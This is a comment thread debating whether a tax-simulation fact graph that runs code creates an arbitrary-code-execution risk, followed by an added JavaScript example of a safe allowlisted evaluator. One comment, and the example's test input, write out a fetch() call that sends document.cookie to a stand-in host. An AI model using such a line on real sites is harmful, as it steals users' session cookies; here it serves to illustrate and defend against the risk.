| ▲ | catlifeonmars 6 hours ago |
| This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data. Now let me send you a fact graph that contains: fetch(`https://callhome.com/collect?s=${document.cookie}`)
| ▲ | n_e 5 hours ago | parent [-] |
| The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist. |
| ▲ | catlifeonmars 5 hours ago | parent [-] |
| Yet. You’re adding one other thing that authors need to keep in mind when developing the product, fixing bugs, and adding features. The fact that the input must be trusted is not an intrinsic part of the business logic, it’s an additional caveat that humans need to remember. |
| ▲ | n_e 4 hours ago | parent [-] |
| What exactly do the developers need to keep in mind? |
| ▲ | catlifeonmars 4 hours ago | parent [-] |
| Well think about this from a product perspective. A natural extension of this is to be able to simulate tax code that hasn’t been implemented yet. “Bring your own facts” is practically begging to be a feature here. |
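
Added example, not part of the thread and not the project's code: one way to keep a fact graph as pure data is to interpret it with a small allowlisted evaluator instead of executing it, so a "bring your own facts" input cannot carry code. The node shape (`{op, args}`, `{fact}`), the function names and the sample figures are assumptions made for illustration.

```javascript
// Added example. The node shape ({op, args}, {fact}) is a hypothetical format.
const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// The only operations a fact may use. Anything else is rejected, not run.
const OPS = {
  add: (a, b) => a + b,
  sub: (a, b) => a - b,
  mul: (a, b) => a * b,
  max: (a, b) => Math.max(a, b),
};

function evalNode(node, graph, seen) {
  if (typeof node === 'number' && Number.isFinite(node)) return node;
  if (node === null || typeof node !== 'object' || Array.isArray(node)) {
    throw new TypeError('fact must be a number or a node, got ' + typeof node);
  }
  if (typeof node.fact === 'string') return evalFact(node.fact, graph, seen);
  // Own-property lookup so "constructor" or "__proto__" never resolve to an op.
  if (typeof node.op !== 'string' || !has(OPS, node.op)) {
    throw new TypeError('unknown op: ' + String(node.op));
  }
  if (!Array.isArray(node.args) || node.args.length !== 2) {
    throw new TypeError(node.op + ' takes exactly two args');
  }
  const [a, b] = node.args.map((arg) => evalNode(arg, graph, seen));
  return OPS[node.op](a, b);
}

function evalFact(name, graph, seen = new Set()) {
  if (!has(graph, name)) throw new ReferenceError('unknown fact: ' + name);
  if (seen.has(name)) throw new RangeError('cycle through fact: ' + name);
  return evalNode(graph[name], graph, new Set(seen).add(name));
}

// Constructed sample graphs (figures are made up, not real tax values).
const trusted = JSON.parse(`{
  "wages": 52000,
  "deduction": 14600,
  "taxable": {"op": "max", "args": [0, {"op": "sub",
    "args": [{"fact": "wages"}, {"fact": "deduction"}]}]}
}`);
// The string from the first comment, supplied as a fact: it stays a string.
const hostile = { taxable: 'fetch(`https://callhome.com/collect?s=${document.cookie}`)' };

function outcome(graph) {
  try { return evalFact('taxable', graph); } catch (e) { return e.name; }
}
console.log(outcome(trusted), outcome(hostile));
```

With this design the trust requirement moves out of developers' heads and into the evaluator: an untrusted graph can only fail validation or produce a number.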